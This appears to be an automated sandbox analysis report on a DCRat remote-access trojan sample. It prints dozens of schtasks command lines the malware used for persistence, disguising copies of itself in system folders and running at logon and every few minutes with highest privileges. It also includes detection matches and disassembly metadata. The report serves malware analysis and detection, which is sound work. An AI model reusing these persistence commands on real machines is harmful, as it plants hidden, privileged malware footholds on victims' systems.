Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 7 /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 12 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 9 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 13 /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 11 /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe"
Imagebase:	0xc0000
File size:	893'440 bytes
MD5 hash:	B26EA50DE8F1DA57B78E045EC904E19A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.1967465796.0000000002361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.1967465796.000000000239F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe"
Imagebase:	0x410000
File size:	893'440 bytes
MD5 hash:	B26EA50DE8F1DA57B78E045EC904E19A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.1966435389.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
Imagebase:	0xa60000
File size:	893'440 bytes
MD5 hash:	B26EA50DE8F1DA57B78E045EC904E19A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1967727670.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 78%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:22:18
Start date:	14/12/2024
Path:	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
Imagebase:	0x840000
File size:	893'440 bytes
MD5 hash:	B26EA50DE8F1DA57B78E045EC904E19A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000026.00000002.4145617404.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	18:22:19
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:22:19
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:22:19
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:22:19
Start date:	14/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zLSKhC92h1.bat"
Imagebase:	0x7ff7047c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:22:19
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:22:19
Start date:	14/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff739440000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	24.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 01380871 Relevance: 4.8, Strings: 3, Instructions: 1015COMMON

Download Yara Rule

Strings

@, xrefs: 01381597
<, xrefs: 013809D7
(, xrefs: 0138189E

Memory Dump Source

Source File: 00000000.00000002.1742118365.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_LaRHzSijsq.jbxd

Similarity

API ID:
String ID: ($<$@
API String ID: 0-2995132275
Opcode ID: b8ddc1ef42303f0973b557d0a14947bc539a1a56c7b553e22c5047cf5d96f697
Instruction ID: 4721a0c0035f26506b146e156bf75ca5bc2bfbe7d33d6b8971a7b802fc0740fb
Opcode Fuzzy Hash: b8ddc1ef42303f0973b557d0a14947bc539a1a56c7b553e22c5047cf5d96f697
Instruction Fuzzy Hash: 63B2B174A012198FDB64DF69C984A8EFBF2BF48305F15D1E9E408AB212DB30AD85CF55

Function 013818C8 Relevance: 1.6, APIs: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 01381977

Memory Dump Source

Source File: 00000000.00000002.1742118365.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_LaRHzSijsq.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a00abd194e0ed4a2b423ac5cf67e100f76117d8bec153b381f6c1d3c30acff95
Instruction ID: 18b3c2358c97829d2b42d88e626073522ad5281e4a44770d165f3f9c137af978
Opcode Fuzzy Hash: a00abd194e0ed4a2b423ac5cf67e100f76117d8bec153b381f6c1d3c30acff95
Instruction Fuzzy Hash: 3D3198B9D042589FCB10CFA9E484AEEFBB0AB19310F24902AE854B7210D375A945CF64

Function 013818D0 Relevance: 1.6, APIs: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 01381977

Memory Dump Source

Source File: 00000000.00000002.1742118365.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_LaRHzSijsq.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 31c7e21712cd83ff35f062ad9e7b1ae87343b7603d90a6b97d77c840f603c29b
Instruction ID: bb1421ab7b4e7a0643e425a8fc49a7429e491b1405a5dd37947ca7c2459d25ca
Opcode Fuzzy Hash: 31c7e21712cd83ff35f062ad9e7b1ae87343b7603d90a6b97d77c840f603c29b
Instruction Fuzzy Hash: 533177B9D042589FCB10CFA9E584ADEFBB5AB09310F24A02AE954B7210D375A945CFA4

Function 00F9D214 Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1741637601.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_LaRHzSijsq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bba3d6bfa04ed9c2d6b7216ef1f6020c8e3a942caa1cb094b091c7c118f0ec44
Instruction ID: c4d152adf6085b1ce8c54d8324e69d741336d91cbe4a775005f45381c4572ed3
Opcode Fuzzy Hash: bba3d6bfa04ed9c2d6b7216ef1f6020c8e3a942caa1cb094b091c7c118f0ec44
Instruction Fuzzy Hash: 2521F172904200DFEF05DF54D980B2ABB65FB88324F30C569E9090B256C336D856EBA1

Function 00F9D20F Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1741637601.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_LaRHzSijsq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
Instruction ID: 33fd2a6d0fb33fb402251f80e434c564623419ddb2e567376164466aede0bd52
Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
Instruction Fuzzy Hash: 17219D76904280DFDF06CF54D9C4B16BF62FB98324F24C5A9D9090A656C33AD81ADBA1

Analysis Process: ry0bqfj0.vyo.exePID: 7436, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.3%
Total number of Nodes:	1485
Total number of Limit Nodes:	29

Executed Functions

Function 007ED5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007E00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 007E00E4
Part of subcall function 007E00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007E00F6
Part of subcall function 007E00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007E0127

Part of subcall function 007E9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 007E9DAC

Part of subcall function 007EA335: OleInitialize.OLE32(00000000), ref: 007EA34E
Part of subcall function 007EA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007EA385
Part of subcall function 007EA335: SHGetMalloc.SHELL32(00818430), ref: 007EA38F

Part of subcall function 007E13B3: GetCPInfo.KERNEL32(00000000,?), ref: 007E13C4
Part of subcall function 007E13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 007E13D8

GetCommandLineW.KERNEL32 ref: 007ED61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 007ED643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 007ED654
UnmapViewOfFile.KERNEL32(00000000), ref: 007ED68E

Part of subcall function 007ED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ED29D
Part of subcall function 007ED287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ED2D9

CloseHandle.KERNEL32(00000000), ref: 007ED697
GetModuleFileNameW.KERNEL32(00000000,0082DC90,00000800), ref: 007ED6B2
SetEnvironmentVariableW.KERNEL32(sfxname,0082DC90), ref: 007ED6BE
GetLocalTime.KERNEL32(?), ref: 007ED6C9
_swprintf.LIBCMT ref: 007ED708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 007ED71A
GetModuleHandleW.KERNEL32(00000000), ref: 007ED721
LoadIconW.USER32(00000000,00000064), ref: 007ED738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 007ED789
Sleep.KERNEL32(?), ref: 007ED7B7
DeleteObject.GDI32 ref: 007ED7F0
DeleteObject.GDI32(?), ref: 007ED800
CloseHandle.KERNEL32 ref: 007ED843

Strings

sfxstime, xrefs: 007ED715
sfxname, xrefs: 007ED6B9
winrarsfxmappingfile.tmp, xrefs: 007ED637
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 007ED6F9
C:\Users\user\Desktop, xrefs: 007ED5E9
STARTDLG, xrefs: 007ED77E

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
